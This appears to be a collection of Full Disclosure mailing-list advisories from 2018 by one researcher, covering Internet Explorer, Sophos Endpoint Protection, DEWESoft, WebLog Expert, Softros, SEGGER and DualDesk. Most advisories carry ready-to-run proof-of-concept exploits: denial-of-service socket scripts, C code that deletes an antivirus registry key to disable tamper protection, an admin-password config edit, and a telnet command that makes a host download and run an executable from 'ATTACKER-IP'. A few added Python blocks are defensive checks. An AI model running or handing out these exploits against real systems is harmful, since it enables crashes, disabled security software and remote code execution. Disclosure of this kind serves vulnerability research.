iopl=0 nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=0246
ntdll!NtWaitForMultipleObjects+0x14:
7ffa`be5f0e14 c3  ret

CONTEXT:  (.ecxr)
rax= rbx=01fd4a2ec9d8 rcx=
rdx=7ffabb499398 rsi=01fd4a5b0ce0 rdi=
rip=7ffabb7fc646 rsp=00cca6efe4f8 rbp=00cca6efe600
 r8=  r9=8000 r10=7ffabb499398
r11= r12= r13=7ffabb48d060
r14=0002 r15=0001
iopl=0 nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b efl=00010246
KERNELBASE!StrCmpICW+0x6:
7ffa`bb7fc646 450fb70bmovzx   r9d,word ptr [r11]
ds:`=
Resetting default scope

FAULTING_IP:
KERNELBASE!StrCmpICW+6
7ffa`bb7fc646 450fb70bmovzx   r9d,word ptr [r11]

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 7ffabb7fc646 (KERNELBASE!StrCmpICW+0x0006)
   ExceptionCode: c005 (Access violation)
  ExceptionFlags: 
NumberParameters: 2
   Parameter[0]: 
   Parameter[1]: 
Attempt to read from address 

DEFAULT_BUCKET_ID:  NULL_POINTER_READ
PROCESS_NAME:  iexplore.exe



POC video URL:
==
https://vimeo.com/265691256/



Exploit/POC:

1) Run below python script to create "IE-Win10-Crasha.html"
2) Open IE-Win10-Crasha.html in InternetExplorer v11.371.16299 on Windows 10

payload=('\n'+
'MSIE v11.371.16299 Denial Of Service by hyp3rlinx \n'+
'crashy ware shee\n'+
'\n'+
'Tested successfully on Windows 10\n'+
'\n'
'function doit(){\n'+
'document.getElementById("hate").click();\n'
'alert("DOH!");\n'+
'obj.click();\n'+
'obj.click();\n'+
'}\n'+
'setInterval("doit()", 2000)\n'+
'')

file=open("IE-Win10-Crasha.html","w")
file.write(payload)
file.close()

print 'MS InternetExplorer (Win 10) '
print 'Denial Of Service File Created.'
print 'hyp3rlinx'




Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: April 18, 2018
Vendor closes thread: April 19, 2018
April 20, 2018 : Public Disclosure




hyp3rlinx


Re: [FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass

2018-04-06 Thread hyp3rlinx
I should have included more details for this report; no, you need to be admin.
I believe the enhanced tamper protection safeguards the services even in
safe mode among other things like uninstalling etc...


On Wed, Apr 4, 2018 at 3:48 AM, Buherátor <buhera...@gmail.com> wrote:

> The affected key under HKLM is writable by regular users? A Get-ACL[1]
> output would be appreciated!
>
> And why do you put a batch script inside C code? o.O
>
> [1] https://docs.microsoft.com/en-us/powershell/module/
> microsoft.powershell.security/get-acl?view=powershell-6
>
> Buherátor - @buherator
> PGP: 1DD5 6AFB 0660 4106 7B70  4F71 B84C 47BD 86EA 1855
>
>
> 2018-04-04 6:04 GMT+02:00 hyp3rlinx <apparition...@gmail.com>:
> > [+] Credits: John Page (aka hyp3rlinx)
> > [+] Website: hyp3rlinx.altervista.org
> > [+] Source:
> > http://hyp3rlinx.altervista.org/advisories/SOPHOS-
> ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
> > [+] ISR: Apparition Security
> >
> >
> >
> > Vendor:
> > =
> > www.sophos.com
> >
> >
> >
> > Product:
> > ===
> > Sophos Endpoint Protection v10.7
> >
> > Sophos Endpoint Protection helps secure your workstation by adding
> > prevention, detection, and response technology on top of your operating
> > system.
> > Sophos Endpoint Protection is designed for workstations running Windows
> and
> > macOS. It adds exploit technique mitigations, CryptoGuard
> anti-ransomware,
> > anti-malware, web security, malicious traffic detection, and deep system
> > cleanup.
> >
> >
> >
> > Vulnerability Type:
> > ===
> > Tamper Protection Bypass
> >
> >
> > CVE Reference:
> > ==
> > CVE-2018-4863
> >
> >
> > Security Issue:
> > 
> > Sophos Endpoint Protection offers an enhanced tamper protection mechanism
> > disallowing changes to be made to the Windows registry
> > by creating and setting a special registry key "SEDEnabled" as follows:
> >
> > HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint
> > Defense\TamperProtection\Config
> > Create the following registry key:
> > "SEDEnabled"=dword:0001"
> >
> > From "https://community.sophos.com/kb/en-us/124376; documentation:
> > "You must enable the basic Tamper Protection feature on an endpoint in
> > order to use the Enhanced Tamper Protection"
> >
> > However, this protection mechanism can be bypassed by deleting the
> > following registry key as it is not sufficiently protected.
> > "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos
> Endpoint
> > Defense\"
> >
> > By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper
> > Protection" once the system has been rebooted.
> > Attackers can then create arbitrary registry keys or edit keys and
> settings
> > under the protected "tamper" protection config key.
> > The issue undermines the integrity of the endpoint protection as deleting
> > this key stops the tamper protect driver from loading.
> >
> >
> > SAV OPM customers are unaffected from 10.8.1 onwards, all Central managed
> > customers customers are unaffected.
> > All SAV OPM Preview subscribers have had the fix since 2018-03-01.
> >
> >
> >
> > Exploit/POC:
> > =
> > Compile the below malicious POC "C" code and run on target, PC will
> reboot
> > then we pwn.
> >
> > gcc -o sophos-poc.exe sophos-poc.c
> >
> > "sophos-poc.c"
> >
> > /***SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
> > Even with "SEDEnabled"=dword:0001" set in registry to prevent
> tampering
> > https://community.sophos.com/kb/en-us/124376
> > By hyp3rlinx **/
> >
> > int main(void){
> >  system("reg delete
> > \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos
> Endpoint
> > Defense\"  /f");
> >  system("shutdown -t 0 -r -f");
> > return 0;
> > }
> >
> >
> >
> > Network Access:
> > ===
> > Local
> >
> >
> >
> > Severity:
> > =
> > High
> >
> >
> >
> > Disclosure Timeline:
> > =
> > Vendor Notification: December 4, 2017
> > Vendor Acknowledgement: December 12, 2017
> > Vendor release fixes: March 1, 2018

[FD] CVE-2018-9233 Sophos Endpoint Protection Control Panel v10.7 / Insecure Crypto

2018-04-03 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-CONTROL-PANEL-v10.7-INSECURE-CRYPTO-CVE-2018-9233.txt
[+] ISR: Apparition Security



Vendor:
==
www.sophos.com



Product:
===
Sophos Endpoint Protection - Control Panel v10.7

Sophos Endpoint Protection helps secure your workstation by adding
prevention, detection, and response technology on top of your operating
system.
Sophos Endpoint Protection is designed for workstations running Windows and
macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
anti-malware, web security, malicious traffic detection, and deep system
cleanup.



Vulnerability Type:
===
Insecure Crypto



CVE Reference:
==
CVE-2018-9233



Security Issue:

Sophos Endpoint Protection control panel authentication uses a weak,
unsalted, Unicode-encoded cryptographic hash (SHA1) function. Not using a
salt allows attackers that gain access to the hash to conduct faster
cracking attacks using pre-computed dictionaries, e.g. rainbow tables. This
can potentially result in unauthorized access that could allow changing of
settings, whitelisting or unquarantining files.

The password and config for the Sophos Endpoint Protection control panel
are stored here:
C:\ProgramData\Sophos\Sophos Anti-Virus\Config\machine.xml

e.g.

SHA1 (Unicode) encoding, non-salted, of password = abc123


true689307D2FC53AF0FB941BC1BB42737CE4F3EF540



Using PHP's sha1 function with "mb_convert_encoding" to UTF-16LE we can
verify:

C:\>php -r "print sha1(mb_convert_encoding('abc123', 'UTF-16LE', 'UTF-8'));"
689307d2fc53af0fb941bc1bb42737ce4f3ef540
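
The same unsalted SHA-1-over-UTF-16LE computation reproduced in Python as an added example (not Sophos code), set beside a salted PBKDF2 scheme to show why one precomputed table recovers the stored value but cannot be built against the salted form; the word list is constructed.

```python
import hashlib
import hmac
import os

# Value from the advisory's machine.xml excerpt (password "abc123")
STORED_HASH = "689307D2FC53AF0FB941BC1BB42737CE4F3EF540"


def sophos_style_hash(password):
    """Unsalted SHA-1 over the UTF-16LE bytes of the password, uppercase hex."""
    return hashlib.sha1(password.encode("utf-16-le")).hexdigest().upper()


def precompute(words):
    """One table, built once, works against every install using this scheme."""
    return {sophos_style_hash(w): w for w in words}


def recover(stored_hash, table):
    """Constant-time dictionary hit: no hashing needed at lookup time."""
    return table.get(stored_hash.upper())


def salted_hash(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random per-password salt: the same password
    yields a different string every time, so no table can be precomputed."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "%s$%d$%s" % (salt.hex(), iterations, dk.hex())


def verify_salted(password, stored):
    """Recompute with the stored salt and iteration count, compare in constant time."""
    salt_hex, iterations, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```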



Network Access:
===
Local



Severity:
=
Low


Disclosure Timeline:
=
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor release fixes: March 1, 2018
Vendor requested additional time before disclosing; additional time has
passed.
April 4, 2018 : Public Disclosure




hyp3rlinx



[FD] CVE-2018-4863 Sophos Endpoint Protection v10.7 / Tamper Protection Bypass

2018-04-03 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SOPHOS-ENDPOINT-PROTECTION-v10.7-TAMPER-PROTECTION-BYPASS-CVE-2018-4863.txt
[+] ISR: Apparition Security



Vendor:
=
www.sophos.com



Product:
===
Sophos Endpoint Protection v10.7

Sophos Endpoint Protection helps secure your workstation by adding
prevention, detection, and response technology on top of your operating
system.
Sophos Endpoint Protection is designed for workstations running Windows and
macOS. It adds exploit technique mitigations, CryptoGuard anti-ransomware,
anti-malware, web security, malicious traffic detection, and deep system
cleanup.



Vulnerability Type:
===
Tamper Protection Bypass


CVE Reference:
==
CVE-2018-4863


Security Issue:

Sophos Endpoint Protection offers an enhanced tamper protection mechanism
disallowing changes to be made to the Windows registry
by creating and setting a special registry key "SEDEnabled" as follows:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint
Defense\TamperProtection\Config
Create the following registry key:
"SEDEnabled"=dword:0001"

From the "https://community.sophos.com/kb/en-us/124376" documentation:
"You must enable the basic Tamper Protection feature on an endpoint in
order to use the Enhanced Tamper Protection"

However, this protection mechanism can be bypassed by deleting the
following registry key as it is not sufficiently protected.
"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint
Defense\"

By deleting this key this bypasses the Sophos Endpoint "Enhanced Tamper
Protection" once the system has been rebooted.
Attackers can then create arbitrary registry keys or edit keys and settings
under the protected "tamper" protection config key.
The issue undermines the integrity of the endpoint protection as deleting
this key stops the tamper protect driver from loading.


SAV OPM customers are unaffected from 10.8.1 onwards; all Central managed
customers are unaffected.
All SAV OPM Preview subscribers have had the fix since 2018-03-01.



Exploit/POC:
=
Compile the below malicious POC "C" code and run it on the target; the PC
will reboot, then we pwn.

gcc -o sophos-poc.exe sophos-poc.c

"sophos-poc.c"

/* SOPHOS ANTIVIRUS ENDPOINT ENHANCED TAMPER PROTECTION BYPASS
   Even with "SEDEnabled"=dword:00000001 set in the registry to prevent tampering
   https://community.sophos.com/kb/en-us/124376
   By hyp3rlinx */

#include <stdlib.h>

int main(void){
    /* Delete the Sophos Endpoint Defense service key; Tamper Protection does not guard it */
    system("reg delete \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\services\\Sophos Endpoint Defense\" /f");
    /* Reboot immediately so the tamper-protection driver is not loaded on the next boot */
    system("shutdown -t 0 -r -f");
    return 0;
}
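A check for the state this advisory describes, as an added example (not Sophos code and not part of the original advisory): it parses a `reg export` of the Services key and reports whether Enhanced Tamper Protection is enabled, disabled, or whether the "Sophos Endpoint Defense" service key is gone, which is what the PoC leaves behind. The sample exports are constructed; only the key path and the "SEDEnabled" value come from the advisory.

```python
import re

# Key path and value from the advisory.
SED_SERVICE_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense"
SED_CONFIG_KEY = SED_SERVICE_KEY + r"\TamperProtection\Config"
SED_VALUE = "SEDEnabled"

_KEY_RE = re.compile(r"^\[(-?)(.+)\]$")                        # [key] or [-key] (deletion)
_DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')  # "name"=dword:xxxxxxxx


def parse_reg_export(text):
    """Parse the subset of .reg syntax needed here: [key] headers (a leading
    '-' marks a key the file deletes) and "name"=dword:xxxxxxxx values.
    Returns ({key_lower: {name: int}}, {deleted_key_lower}). Registry paths
    are case-insensitive, so keys are compared lower-cased."""
    keys, deleted, current = {}, set(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.match(line)
        if m:
            minus, name = m.group(1), m.group(2).lower()
            if minus:
                deleted.add(name)
                current = None
            else:
                keys.setdefault(name, {})
                current = name
            continue
        m = _DWORD_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys, deleted


def tamper_protection_state(export_text):
    """'enabled'             : service key present and SEDEnabled == 1
       'disabled'            : service key present, SEDEnabled absent or != 1
       'service-key-missing' : the whole Sophos Endpoint Defense key is gone
                               (what the PoC leaves behind; the driver will not load)"""
    keys, deleted = parse_reg_export(export_text)
    svc = SED_SERVICE_KEY.lower()
    present = any(k == svc or k.startswith(svc + "\\") for k in keys)
    if svc in deleted or not present:
        return "service-key-missing"
    cfg = keys.get(SED_CONFIG_KEY.lower(), {})
    return "enabled" if cfg.get(SED_VALUE) == 1 else "disabled"


# Constructed sample exports (not captured from a real system).
HEALTHY_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint Defense\TamperProtection\Config]
"SEDEnabled"=dword:00000001
"""

DISABLED_EXPORT = HEALTHY_EXPORT.replace("dword:00000001", "dword:00000000")

# After the PoC ran, an export of the Services key no longer contains the
# Sophos Endpoint Defense subtree at all.
AFTER_BYPASS_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services]
"""

if __name__ == "__main__":
    for label, export in (("healthy", HEALTHY_EXPORT), ("disabled", DISABLED_EXPORT),
                          ("after PoC", AFTER_BYPASS_EXPORT)):
        print(f"{label:10s}: {tamper_protection_state(export)}")
```

On a real host, produce the input with `reg export "HKLM\SYSTEM\CurrentControlSet\Services" services.reg` and read it with `open("services.reg", encoding="utf-16")`, since reg export writes UTF-16LE with a BOM.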



Network Access:
===
Local



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: December 4, 2017
Vendor Acknowledgement: December 12, 2017
Vendor release fixes: March 1, 2018
Vendor requested additional time before disclosure; that additional time
has passed.
April 4, 2018  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] DEWESoft X3 SP1 (64-bit) installer / Remote Internal Command Access - CVE-2018-7756

2018-03-13 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt
[+] ISR: Apparition Security



Vendor:
=
www.dewesoft.com


Product:
===
DEWESoft X3 SP1 (64-bit) installer - X3
DEWESoft_FULL_X3_SP1_64BIT.exe



Vulnerability Type:
===
Remote Internal Command Access



CVE Reference:
==
CVE-2018-7756



Security Issue:

The installer for DEWESoft X3 SP1 (64-bit) devices, specifically the
"RunExeFile.exe" component, does not require authentication for sessions on
TCP port 1999. This allows remote attackers to execute arbitrary code or
access internal commands, as demonstrated by a RUN command that can launch
an .EXE file located in an arbitrary directory, download an .EXE from an
external URL, or run a "SETFIREWALL Off" command.

The RunExeFile.exe "Launcher" is located at "C:\Program Files (x86)\Common
Files\DEWESoft Shared\" after installing using the full-install.

Internal commands used by "RunExeFile.exe", for which I could not find any
documentation:

RUN 
RUNEX 
GETFIREWALL
SETFIREWALL Off
KILL 
USERNAME
SHUTDOWN
SENDKEYS
LIST
DWPIPE

Exploit/POC:
=
TELNET x.x.x.x 1999
RUN calc.exe

OR

Launch the victim's browser and send it to a website for a drive-by
download:

TELNET x.x.x.x 1999
RUN http://ATTACKER-IP/DOOM.exe

Then, from the TELNET session, execute it from the Downloads directory.

runexe c:\Users\victim\Downloads\DOOM.exe


Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification: February 9, 2018
Vendor "thank you for the warning. We will forward this to the developers
and they will look into it" : February 19, 2018
Inform vendor of disclosure timeline : February 19, 2018
No further replies, updates or addressing of the issue by the vendor.
Vendor "We will assume that this issue is resolved and close the ticket." :
March 6, 2018
March 10, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] WebLog Expert Web Server Enterprise v9.4 / Remote Denial Of Service CVE-2018-7582

2018-03-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security


Vendor:
===
www.weblogexpert.com


Product:
=
WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you
information about your site's visitors:
activity statistics, accessed files, paths through the site, information
about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that
include both text information (tables) and charts.



Vulnerability Type:
===
Denial Of Service


CVE Reference:
==
CVE-2018-7582



Security Issue:

WebLog Expert Web Server Enterprise 9.4 allows Remote Denial Of Service
(daemon crash) via a long HTTP Accept Header to TCP port 9991.


(e7c.1750): CLR exception - code e0434352 (first/second chance not available)
eax=00000000 ebx=06d1d098 ecx=00000005 edx=00000000 esi=00000002 edi=00000000
eip=778d016d esp=06d1d048 ebp=06d1d0e4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
778d016d 83c404          add     esp,4



Exploit/POC:
=
import socket

print('Weblog Expert Server / Denial Of Service')
print('hyp3rlinx')

IP = 'Weblog Expert Server IP'   # set to the target address
PORT = 9991
# Long Accept header: 2000 'A' characters crash the daemon
PAYLOAD = ("GET /index.html HTTP/1.0\r\n"
           "Host: " + IP + ":9991\r\n"
           "User-Agent: Mozilla\r\n"
           "Accept: */*" + "A" * 2000 + "\r\n\r\n")

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))
s.send(PAYLOAD.encode())
s.close()




Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: February 3, 2018
Second attempt : February 17, 2018
March 7, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] WebLog Expert Web Server Enterprise v9.4 / Authentication Bypass CVE-2018-7581

2018-03-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/WEBLOG-EXPERT-WEB-SERVER-ENTERPRISE-v9.4-AUTHENTICATION-BYPASS.txt
[+] ISR: Apparition Security


Vendor:

www.weblogexpert.com


Product:

WebLog Expert Web Server Enterprise v9.4

WebLog Expert is a fast and powerful access log analyzer. It will give you
information about your site's visitors:
activity statistics, accessed files, paths through the site, information
about referring pages, search engines, browsers,
operating systems, and more. The program produces easy-to-read reports that
include both text information (tables) and charts.



Vulnerability Type:
===
Authentication Bypass



CVE Reference:
==
CVE-2018-7581



Security Issue:

The "WebServer.cfg" file under "C:\ProgramData\WebLog Expert\WebServer\",
used by WebLog Expert Web Server Enterprise 9.4, has weak permissions
(BUILTIN\Users:(ID)C). A standard, non-administrator Windows user can
therefore edit the file, set a cleartext password and log in as admin.

e.g.

C:\ProgramData\WebLog Expert\WebServer>cacls * | more
C:\ProgramData\WebLog Expert\WebServer\WebServer.cfg BUILTIN\Users:(ID)C
                                                     BUILTIN\Administrators:(ID)C
                                                     NT AUTHORITY\SYSTEM:(ID)F
                                                     BUILTIN\Administrators:(ID)F


Exploit/POC:
=
Log in as a 'Standard' Windows user.
Comment out the admin hashed password using ';', then add any cleartext
password as follows.

[User:admin]
Password=1234
;PasswordHash=3413C538CE5234FB194E82AE1F3954FD2BC848C0
bAllProfiles=1

Now log in as admin! :)



Network Access:
===
Local



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: March 1, 2018
No replies from previous attempts
March 7, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] Softros Network Time System Server v2.3.4 / Denial Of Service CVE-2018-7658

2018-03-06 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security


Vendor:
=
www.softros.com
https://nts.softros.com/downloads/


Product:
===
Network Time System Server v2.3.4
Both x86/x64 versions


Network Time System provides a solution to system time maintenance
problems. This powerful client/server software enables you to set up a
virtually fail-safe synchronized time environment for networks of any size
and complexity, from small office networks (LAN) to those
maintained at large enterprises (VPN, VLAN, WAN), from single site networks
to those including numerous domains and involving complex
routing techniques. Network Time System allows the creation of a custom
source of precise time in a corporate network environment
establishing an interconnected time synchronization system for each and
every machine and device on the company network.


Vulnerability Type:
===
Denial Of Service



CVE Reference:
==
CVE-2018-7658


Security Issue:

The Network Time System (Server) "NTSServerSvc" service listens on TCP port
7001. Unauthenticated remote attackers can crash the server by sending
exactly 11 bytes to the target system; systems that depend on critical time
synchronization could then be impacted.


Stack dump:

'''
eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010297
NTSServerSvc+0x69a5:
004069a5 880a            mov     byte ptr [edx],cl          ds:0023:00000000=??
Resetting default scope

FAULTING_IP:
NTSServerSvc+69a5
004069a5 880a            mov     byte ptr [edx],cl

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 004069a5 (NTSServerSvc+0x69a5)
   ExceptionCode: c0000005 (Access violation)

'''


Exploit/POC:
=
import socket
# Network Time System (Server) NTSServerSvc.exe v2.3.4
# Softros Systems
# NTS Server service for time synchronization over network

print('Network Time Server 11 byte Denial Of Service')
print('by hyp3rlinx')
HOST = input('Network Time Server IP> ')
PORT = 7001
payload = b'A' * 11          # exactly 11 bytes crashes NTSServerSvc
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.send(payload)
s.close()



Network Access:
===
Remote


Severity:
=
Medium


Disclosure Timeline:
=
Vendor Notification: February 10, 2018
Second attempt : February 24, 2018
Request CVE, assigned by Mitre : March 3, 2018
March 5, 2018: Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] CVE-2018-7449 SEGGER embOS/IP FTP Server v3.22 / FTP CMDs Denial Of Service

2018-03-02 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SEGGER-embOS-FTP-SERVER-v3.22-FTP-COMMANDS-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security



Vendor:
=
www.segger.com


Product:
===
embOS/IP FTP Server v3.22


Vulnerability Type:
===
FTP Commands Denial Of Service



CVE Reference:
==
CVE-2018-7449


Security Issue:

SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial
of service (daemon crash) via an invalid LIST, STOR, or RETR command, e.g.:

STOR 666\r\n
LIST\r\n
RETR ..\..\..\..\..\..\..\..\Windows\system.ini\r\n


TELNET x.x.x.x 21

220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!

CRASH!!!



Exploit/POC:
=
import socket, time

VICTIM = input('[+]Segger v3.22 FTP Server IP > ')
USR = 'anonymous'
PWD = 'anonymous'
CMD = "STOR Bye!\r\n"      # invalid STOR; LIST and RETR crash the daemon too

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21))
print(s.recv(1024))        # receive FTP banner
time.sleep(1)
s.send(("USER " + USR + "\r\n").encode())
print(s.recv(1024))
time.sleep(1)
s.send(("PASS " + PWD + "\r\n").encode())
print(s.recv(1024))
time.sleep(1)
s.send(CMD.encode())
print('Sent %s' % CMD)
s.close()




Network Access:
===
Remote



Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification:  February 17, 2018
Vendor acknowledgement: February 19, 2018
Vendor released fixed version v3.22a : February 23, 2018
March 1, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] DualDesk v20 "Proxy.exe" Server / Denial Of Service - CVE-2018-7583

2018-03-02 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DUALDESK-v20-DENIAL-OF-SERVICE.txt
[+] ISR: Apparition Security


Vendor:
===
www.dualdesk.com



Product:
===
DualDesk v20

DualDesk is powerful, easy to use remote support software that is a
one-time purchase and lets your
technical support staff remote assist a PC anywhere on the internet through
firewalls in seconds with no
configuration.



Vulnerability Type:
===
Denial Of Service



CVE Reference:
==
CVE-2018-7583


Security Issue:

Remote unauthenticated attackers can crash the "Proxy.exe" server component
of the DualDesk application, which listens on TCP port 5500, by sending a
long string of junk characters.

(d24.d60): Security check failure or stack buffer overrun - code c0000409 (first/second chance not available)
eax=00000000 ebx=0257f1c0 ecx=00000000 edx=00000000 esi=00000002 edi=00000000
eip=77c6016d esp=0257f170 ebp=0257f20c iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
ntdll!NtWaitForMultipleObjects+0x15:
77c6016d 83c404          add     esp,4


Exploit/POC:
=
Start the Dualdesk Run Proxy as Application.

C:\>python -c "print 'a'*8000" > crash.txt

C:\>type crash.txt | nc.exe localhost 5500

Crash!!!
